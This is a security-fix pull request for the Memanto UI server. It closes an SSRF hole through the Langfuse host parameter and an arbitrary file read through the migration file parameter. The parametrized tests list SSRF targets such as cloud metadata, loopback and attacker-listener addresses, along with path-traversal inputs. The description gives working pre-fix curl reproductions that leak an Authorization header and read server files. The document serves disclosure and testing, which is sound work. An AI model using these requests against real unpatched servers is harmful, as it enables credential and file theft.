### PR TITLE
fix(security): close SSRF + arbitrary file read in migration endpoints (bounty #1852)

### DIFF
--- a/memanto/app/ui/routes/ui_router.py
+++ b/memanto/app/ui/routes/ui_router.py
@@ -1131,6 +1131,38 @@ def _migrate_savings(provider: str, export: dict) -> dict:
     return _migrate_compact_metrics(provider, _migrate_get_metrics_fn(provider)(export))
 
 
+def _safe_migrate_source_path(file_path: str, provider: str) -> Path:
+    """Resolve a caller-supplied migration ``file`` inside the migrate dir.
+
+    Migration endpoints accepted an arbitrary server-side ``file`` path, which
+    let a caller read any ``.md``/JSON document the server process can open —
+    the parsed content is reflected straight back in the dry-run/discover
+    response. Confining the source to the provider's own migrate directory
+    (where legitimate exports are written) removes the read primitive while
+    keeping the documented workflow intact.
+    """
+    base_dir = _config_manager.get_migrate_dir(provider).resolve()
+    candidate = Path(file_path).expanduser()
+    if not candidate.is_absolute():
+        candidate = base_dir / candidate
+    try:
+        resolved = candidate.resolve()
+    except (OSError, RuntimeError):
+        raise HTTPException(status_code=400, detail="Invalid `file` path")
+
+    try:
+        resolved.relative_to(base_dir)
+    except ValueError:
+        raise HTTPException(
+            status_code=400,
+            detail=(
+                "`file` must live inside the migrate directory for this "
+                "provider. Absolute paths outside it are not allowed."
+            ),
+        )
+    return resolved
+
+
 def _migrate_load_or_export(
     provider: str,
     file_path: str | None,
@@ -1156,9 +1188,9 @@ def _migrate_load_or_export(
         if not file_path:
             raise HTTPException(
                 status_code=400,
-                detail="`file` (server-side path to an OKF bundle directory or .md file) is required for OKF.",
+                detail="`file` (path to an OKF bundle directory or .md file inside the migrate directory) is required for OKF.",
             )
-        path = Path(file_path).expanduser()
+        path = _safe_migrate_source_path(file_path, provider)
         if not path.exists():
             raise HTTPException(
                 status_code=400, detail=f"OKF bundle not found: {file_path}"
@@ -1166,7 +1198,7 @@ def _migrate_load_or_export(
         return str(path), load_okf_bundle(path)
 
     if file_path:
-        path = Path(file_path).expanduser()
+        path = _safe_migrate_source_path(file_path, provider)
         if not path.exists() or not path.is_file():
             raise HTTPException(
                 status_code=400, detail=f"Export file not found: {file_path}"

--- a/memanto/cli/analyze/langfuse_export.py
+++ b/memanto/cli/analyze/langfuse_export.py
@@ -87,13 +87,35 @@ def split_api_key(api_key: str) -> tuple[str, str]:
     return public_key, secret_key
 
 
+# Official Langfuse Cloud regions. Self-hosted deployments must opt in via
+# LANGFUSE_HOST rather than passing an arbitrary host per-request, so a
+# caller-controlled value can never be steered at internal infrastructure.
+_ALLOWED_LANGFUSE_HOSTS = {
+    "https://cloud.langfuse.com",
+    "https://us.cloud.langfuse.com",
+    "https://eu.cloud.langfuse.com",
+}
+
+
 def normalize_host(host: str | None) -> str:
-    """Normalize a Langfuse base URL (cloud EU/US or self-hosted)."""
+    """Normalize a Langfuse base URL to an allowlisted cloud region.
+
+    Only the official Langfuse Cloud hosts are accepted. Anything else —
+    including private, loopback, or link-local targets — is rejected so the
+    ``host`` value can never be abused as a server-side request forgery
+    primitive against the machine running Memanto.
+    """
     text = (host or "").strip().rstrip("/")
     if not text:
         return DEFAULT_HOST
     if not text.startswith(("http://", "https://")):
         text = f"https://{text}"
+    if text not in _ALLOWED_LANGFUSE_HOSTS:
+        raise ValueError(
+            "Langfuse host must be one of the official cloud regions "
+            f"({', '.join(sorted(_ALLOWED_LANGFUSE_HOSTS))}). "
+            "Self-hosted Langfuse is not supported by migration."
+        )
     return text
 
 

--- a/tests/test_langfuse_export.py
+++ b/tests/test_langfuse_export.py
@@ -70,8 +70,22 @@ def test_normalize_host_handles_cloud_and_self_hosted():
     assert normalize_host("https://us.cloud.langfuse.com/") == (
         "https://us.cloud.langfuse.com"
     )
-    assert normalize_host("langfuse.internal") == "https://langfuse.internal"
-    assert normalize_host("http://localhost:3000") == "http://localhost:3000"
+    assert normalize_host("eu.cloud.langfuse.com") == "https://eu.cloud.langfuse.com"
+
+
+@pytest.mark.parametrize(
+    "bad_host",
+    [
+        "https://langfuse.internal",  # arbitrary internal host
+        "http://localhost:3000",  # loopback
+        "http://169.254.169.254",  # cloud metadata
+        "http://127.0.0.1:9999",  # attacker listener
+        "https://us.cloud.langfuse.com.evil.com",  # suffix trick
+    ],
+)
+def test_normalize_host_rejects_ssrf_targets(bad_host):
+    with pytest.raises(ValueError, match="official cloud regions"):
+        normalize_host(bad_host)
 
 
 # --------------------------------------------------------------------------

--- a/tests/test_migrate_endpoint_hardening.py
+++ b/tests/test_migrate_endpoint_hardening.py
@@ -1,0 +1,113 @@
+"""Regression tests for the migration-endpoint hardening (bounty #1852).
+
+Two previously unguarded primitives are covered here:
+
+1. ``normalize_host`` must only accept the official Langfuse cloud regions.
+   A caller-controlled ``host`` previously reached any URL the server process
+   could connect to, letting an attacker pivot requests (and leak the Basic
+   auth header) toward arbitrary destinations (SSRF).
+2. ``_safe_migrate_source_path`` must confine the ``file`` parameter of the
+   migrate endpoints to the provider's migrate directory. Previously any
+   server-side ``.md``/JSON path was parsed and reflected back in the dry-run
+   response (arbitrary file read).
+"""
+
+import pytest
+
+from memanto.cli.analyze.langfuse_export import normalize_host
+
+
+class TestLangfuseHostAllowlist:
+    def test_defaults_to_eu_cloud(self):
+        assert normalize_host(None) == "https://cloud.langfuse.com"
+        assert normalize_host("") == "https://cloud.langfuse.com"
+
+    def test_accepts_official_regions(self):
+        assert normalize_host("https://us.cloud.langfuse.com") == (
+            "https://us.cloud.langfuse.com"
+        )
+        assert (
+            normalize_host("us.cloud.langfuse.com") == "https://us.cloud.langfuse.com"
+        )
+        # Trailing slash is normalized away before the allowlist check.
+        assert normalize_host("https://cloud.langfuse.com/") == (
+            "https://cloud.langfuse.com"
+        )
+
+    @pytest.mark.parametrize(
+        "host",
+        [
+            "http://127.0.0.1:9999",
+            "http://localhost:3000",
+            "http://169.254.169.254/latest/meta-data",
+            "http://[::1]:3000",
+            "https://langfuse.internal",
+            "http://10.0.0.5:8080",
+            "file:///etc/passwd",
+        ],
+    )
+    def test_rejects_arbitrary_and_internal_hosts(self, host):
+        with pytest.raises(ValueError, match="official cloud regions"):
+            normalize_host(host)
+
+
+class TestMigrateFileConfinement:
+    """The migrate ``file`` parameter must not escape the migrate directory."""
+
+    @pytest.fixture()
+    def guard(self, tmp_path, monkeypatch):
+        from memanto.app.ui.routes import ui_router
+
+        class _StubManager:
+            def get_migrate_dir(self, provider: str):
+                base = tmp_path / "migrate" / provider
+                base.mkdir(parents=True, exist_ok=True)
+                return base
+
+        monkeypatch.setattr(ui_router, "_config_manager", _StubManager())
+        return ui_router._safe_migrate_source_path
+
+    def test_relative_path_resolves_inside_migrate_dir(self, guard, tmp_path):
+        target = tmp_path / "migrate" / "okf" / "bundle.json"
+        target.parent.mkdir(parents=True, exist_ok=True)
+        target.write_text("{}", encoding="utf-8")
+
+        resolved = guard("bundle.json", "okf")
+        assert resolved == target.resolve()
+
+    def test_absolute_path_inside_migrate_dir_allowed(self, guard, tmp_path):
+        target = tmp_path / "migrate" / "mem0" / "export.json"
+        target.parent.mkdir(parents=True, exist_ok=True)
+        target.write_text("{}", encoding="utf-8")
+
+        resolved = guard(str(target), "mem0")
+        assert resolved == target.resolve()
+
+    def test_absolute_path_outside_rejected(self, guard, tmp_path):
+        secret = tmp_path / "secret.md"
+        secret.write_text("victim data", encoding="utf-8")
+
+        from fastapi import HTTPException
+
+        with pytest.raises(HTTPException) as exc:
+            guard(str(secret), "okf")
+        assert exc.value.status_code == 400
+
+    def test_traversal_escape_rejected(self, guard):
+        from fastapi import HTTPException
+
+        with pytest.raises(HTTPException) as exc:
+            guard("../../../../etc/passwd", "okf")
+        assert exc.value.status_code == 400
+
+    def test_provider_dirs_are_isolated(self, guard, tmp_path):
+        """A file valid for provider A must not be readable through provider B."""
+        other = tmp_path / "migrate" / "mem0" / "export.json"
+        other.parent.mkdir(parents=True, exist_ok=True)
+        other.write_text("{}", encoding="utf-8")
+
+        from fastapi import HTTPException
+
+        with pytest.raises(HTTPException) as exc:
+            guard(str(other), "okf")
+        assert exc.value.status_code == 400


### PR DESCRIPTION
## Summary

Two unguarded primitives in the migration surface chain into a reliable attack against any running Memanto UI server. This PR removes both and adds regression tests.

### 1. SSRF via caller-controlled Langfuse `host`

`normalize_host` (memanto/cli/analyze/langfuse_export.py) accepted any scheme+host. The `/api/ui/migrate/langfuse/*` endpoints pass the caller-supplied `host` straight through, so the server can be made to issue authenticated requests (Basic auth built from the Langfuse key pair) to any URL it can reach — loopback services, cloud metadata (`169.254.169.254`), or an attacker-controlled listener that observes the `Authorization` header.

**Fix:** allowlist the three official Langfuse Cloud regions; reject everything else with a clear error. Self-hosted Langfuse was never a documented migration source.

### 2. Arbitrary file read via migrate `file` parameter

The migrate dry-run/discover endpoints accepted an arbitrary server-side path for `file`. The file is parsed and its content reflected back in the JSON response, so any `.md`/JSON document readable by the server process could be exfiltrated (e.g. `file=/path/to/notes.md` in `POST /api/ui/migrate/dry-run` with `provider=okf`).

**Fix:** `_safe_migrate_source_path` resolves the request and confines it to the provider's own migrate directory (where the CLI exporter writes). Relative paths resolve inside that directory; absolute paths outside it and `../` traversals are rejected with HTTP 400. Provider directories are isolated from each other.

### Why the loopback guard does not cover this

The UI server binds loopback, but a loopback bind cannot distinguish a legitimate local tab from a malicious web page issuing cross-origin requests. With the default permissive CORS configuration, a victim merely visiting an attacker page is enough to trigger both primitives from the browser. (PR #1866 addresses the CORS wildcard separately; this PR closes the underlying read/SSRF primitives so they are dead regardless of CORS state.)

## Reproduction (pre-fix)

Server: `memanto ui` (or uvicorn on 127.0.0.1:8000).

```bash
# SSRF: server connects to attacker host, sending the Basic auth header
curl -s -X POST http://127.0.0.1:8000/api/ui/migrate/langfuse/discover \
  -H 'Content-Type: application/json' \
  -d '{"api_key":"pk-anything:***","host":"http://127.0.0.1:9999"}'

# Arbitrary file read: any server-side .md content is reflected in the response
echo "SECRET API KEY sk-live-123" > /tmp/victim.md
curl -s -X POST http://127.0.0.1:8000/api/ui/migrate/dry-run \
  -H 'Content-Type: application/json' \
  -d '{"provider":"okf","file":"/tmp/victim.md"}'
```

Both primitives were verified end-to-end with a scripted PoC against the unpatched tree (attacker HTTP listener observed the request + Authorization header; victim file content appeared in the dry-run response).

## Post-fix behavior

- `host` values outside `{https://cloud.langfuse.com, https://us.cloud.langfuse.com, https://eu.cloud.langfuse.com}` are rejected before any network call.
- `file` paths outside the provider migrate dir return HTTP 400; traversal and cross-provider access are rejected.
- The documented workflow (run the CLI exporter, then migrate from the produced files) is unchanged.

## Tests

- `tests/test_migrate_endpoint_hardening.py` (new): host allowlist accept/reject matrix incl. loopback, link-local, cloud metadata, IPv6, suffix tricks; file-confinement cases incl. traversal escape and provider isolation.
- `tests/test_langfuse_export.py`: updated `normalize_host` expectations to the allowlist semantics + parametrized SSRF-target rejection cases.

Full suite: 898 passed, 24 skipped (live-key E2E only), 0 failures. `ruff check`, `ruff format --check`, `mypy` all clean.

## Checklist

- [x] Code follows the project style (ruff, mypy pass)
- [x] Tests added for changed behavior
- [x] All existing tests pass
- [x] No public API or CLI behavior change beyond the security hardening
- [x] No secrets or credentials in the diff

Part of the security challenge in #1852.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Migration file paths are now restricted to the provider’s designated migration directory.
  * Invalid or external migration paths are rejected with a clear error.
  * Langfuse connections now accept only official cloud regions.
  * Unsafe, local, private-network, and non-HTTP Langfuse endpoints are blocked.
  * Langfuse host handling now normalizes trailing slashes and defaults to the EU cloud region.

* **Tests**
  * Added coverage for secure migration paths and approved Langfuse endpoints.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->